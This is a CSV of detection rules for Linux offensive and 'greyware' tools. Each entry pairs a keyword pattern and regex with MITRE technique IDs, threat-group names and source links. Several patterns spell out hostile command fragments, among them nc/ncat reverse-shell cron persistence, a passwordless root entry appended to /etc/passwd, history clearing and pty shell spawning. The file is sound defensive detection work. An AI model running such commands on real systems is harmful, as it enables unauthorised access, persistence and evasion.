linux_tag_detection.csv

"keyword","metadata_keyword_regex","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_tags","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at"
"* server -p 80 --reverse --socks5*",".{0,1000}\sserver\s\-p\s80\s\-\-reverse\s\-\-socks5.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*./chisel *",".{0,1000}\.\/chisel\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* $lse_find_opts *",".{0,1000}\s\$lse_find_opts\s.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"* ./level-darwin-bundle-amd64.pkg*",".{0,1000}\s\.\/level\-darwin\-bundle\-amd64\.pkg.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"* ./level-linux-amd64 *",".{0,1000}\s\.\/level\-linux\-amd64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"* ./level-linux-arm64 *",".{0,1000}\s\.\/level\-linux\-arm64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"* ./sf.py -l 127.0.0.1:5001*",".{0,1000}\s\.\/sf\.py\s\-l\s127\.0\.0\.1\:5001.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A"
"* /bin/nc * -e /bin/bash* > cron && crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\s\>\scron\s\&\&\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","Calypso - GALLIUM","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"* /bin/nc * -e /bin/bash*> * crontab cron*",".{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\>\s.{0,1000}\scrontab\scron.{0,1000}","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","Calypso - GALLIUM","Exploitation tool","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*/passwd_tracer.c*",".{0,1000}\/passwd_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","739","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
"*echo *::0:0::/root:/bin/bash* >>/etc/passwd*",".{0,1000}echo\s.{0,1000}\:\:0\:0\:\:\/root\:\/bin\/bash.{0,1000}\s\>\>\/etc\/passwd.{0,1000}","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","8","N/A","N/A","N/A","N/A"
"* /usr/local/bin/expose*",".{0,1000}\s\/usr\/local\/bin\/expose.{0,1000}","greyware_tool_keyword","expose","tunneling service - written in pure PHP","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/beyondcode/expose","1","0","#linux","N/A","10","10","4261","266","2024-09-25T09:30:30Z","2020-04-14T19:18:38Z"
"* | ./send -d *:123 -tM 0 -tm 0*",".{0,1000}\s\|\s\.\/send\s\-d\s.{0,1000}\:123\s\-tM\s0\s\-tm\s0.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","137","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z"
"*Airgeddon*",".{0,1000}Airgeddon.{0,1000}","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","#linux","N/A","5","10","6576","1176","2024-12-05T13:22:05Z","2016-03-18T10:34:56Z"
"*APT::Update::Pre-Invoke *}*",".{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}\}.{0,1000}","greyware_tool_keyword","APT","linux commands abused by attackers - backdoor apt execute a command when invoking apt","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* a -r -cfg -sfx -z""SFXAutoInstaller.conf"" Standalone.exe*",".{0,1000}\sa\s\-r\s\-cfg\s\-sfx\s\-z\""SFXAutoInstaller\.conf\""\sStandalone\.exe.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","341","307","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z"
"* --archive-type zip --symlinks ""../etc/hosts*linkname"" archive  *",".{0,1000}\s\-\-archive\-type\szip\s\-\-symlinks\s\""\.\.\/etc\/hosts.{0,1000}linkname\""\sarchive\s\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","1","90","4","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z"
"* bash ddexec.sh*",".{0,1000}\sbash\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"* by @citronneur (v*",".{0,1000}\sby\s\@citronneur\s\(v.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"* -c 'import pty;pty.spawn(""/bin/bash*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/bash.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","#linux","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","risk of False positive","4","10","34357","14025","2024-12-07T15:05:00Z","2011-08-30T06:13:20Z"
"* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","#linux","greyware_tools high risks of false positives","6","10","N/A","N/A","N/A","N/A"
"* -c 'import pty;pty.spawn(\""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\\\""\/bin\/sh.{0,1000}","greyware_tool_keyword","python","interactive shell","T1059","TA0002 - TA0011","N/A","N/A","C2","N/A","1","0","#linux","greyware_tools high risks of false positives","6","4","N/A","N/A","N/A","N/A"
"* catspin.sh *",".{0,1000}\scatspin\.sh\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#linux","N/A","9","3","255","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z"
"* ddexec.sh *",".{0,1000}\sddexec\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"* ddsc.sh -x*",".{0,1000}\sddsc\.sh\s\-x.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"* deepce.sh *--install*",".{0,1000}\sdeepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"* --domains ./domains.txt run*",".{0,1000}\s\-\-domains\s\.\/domains\.txt\srun.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","#linux","N/A","6","7","691","113","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z"
"*pip install flask flask_cors && ./runserver.sh*",".{0,1000}pip\sinstall\sflask\sflask_cors\s\&\&\s\.\/runserver\.sh.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#linux","N/A","10","4","341","307","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z"
"*ArchStrike*",".{0,1000}ArchStrike.{0,1000}","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* Exrop(*/bin/*",".{0,1000}\sExrop\(.{0,1000}\/bin\/.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","#linux","N/A","N/A","3","280","23","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
"* backhack.py*",".{0,1000}\sbackhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*/BackHAck.git*",".{0,1000}\/BackHAck\.git.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*/backhack.py*",".{0,1000}\/backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*\backhack.py*",".{0,1000}\\backhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95*",".{0,1000}48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8*",".{0,1000}93df885410ce2b2ea1428127077bcf574e56838ce8ccf4ea410a1f120544f9b8.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"* impress-remote-discover.nse*",".{0,1000}\simpress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","#filehash #linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* install cliws*",".{0,1000}\sinstall\scliws.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","157","27","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z"
"*AngelSecurityTeam/BackHAck*",".{0,1000}AngelSecurityTeam\/BackHAck.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*AngelSecurityTeam-BackdoorLinux*",".{0,1000}AngelSecurityTeam\-BackdoorLinux.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*curl -s -N http://127.0.0.1:4040/api/tunnels*",".{0,1000}curl\s\-s\s\-N\shttp\:\/\/127\.0\.0\.1\:4040\/api\/tunnels.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*https://bin.equinox.io/c/4VmDzA7iaHb/*",".{0,1000}https\:\/\/bin\.equinox\.io\/c\/4VmDzA7iaHb\/.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"* linpeas.sh *",".{0,1000}\slinpeas\.sh\s.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#linux","N/A","N/A","10","16361","3115","2024-12-05T17:08:48Z","2019-01-13T19:58:24Z"
"*ngrok-stable-linux-arm.zip*",".{0,1000}ngrok\-stable\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*python3 -m http.server 80 > .server 2> /dev/null*",".{0,1000}python3\s\-m\shttp\.server\s80\s\>\s\.server\s2\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","103","33","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z"
"*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","#linux","greyware tool - risks of False positive !","10","10","9917","2830","2024-12-03T04:36:14Z","2017-10-11T17:23:32Z"
"*HISTORY=/dev/null*",".{0,1000}HISTORY\=\/dev\/null.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*for i in {1..65535}*",".{0,1000}for\si\sin\s\{1\.\.65535\}.{0,1000}","greyware_tool_keyword","bash port scan","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Discovery","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"* beRoot.exe*",".{0,1000}\sbeRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"* beRoot.py*",".{0,1000}\sbeRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*/beRoot.exe*",".{0,1000}\/beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*/BeRoot.git*",".{0,1000}\/BeRoot\.git.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*/beRoot.py*",".{0,1000}\/beRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*/beRoot.zip*",".{0,1000}\/beRoot\.zip.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*/gtfobins.py*",".{0,1000}\/gtfobins\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*\beRoot.exe*",".{0,1000}\\beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*beRoot.exe -*",".{0,1000}beRoot\.exe\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"* ncat * -e /bin/bash*|crontab*",".{0,1000}\sncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\|crontab.{0,1000}","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002  - TA0005","N/A","Calypso - GALLIUM","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*beroot.py -*",".{0,1000}beroot\.py\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
"*BeRoot-master*",".{0,1000}BeRoot\-master.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2452","464","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z"
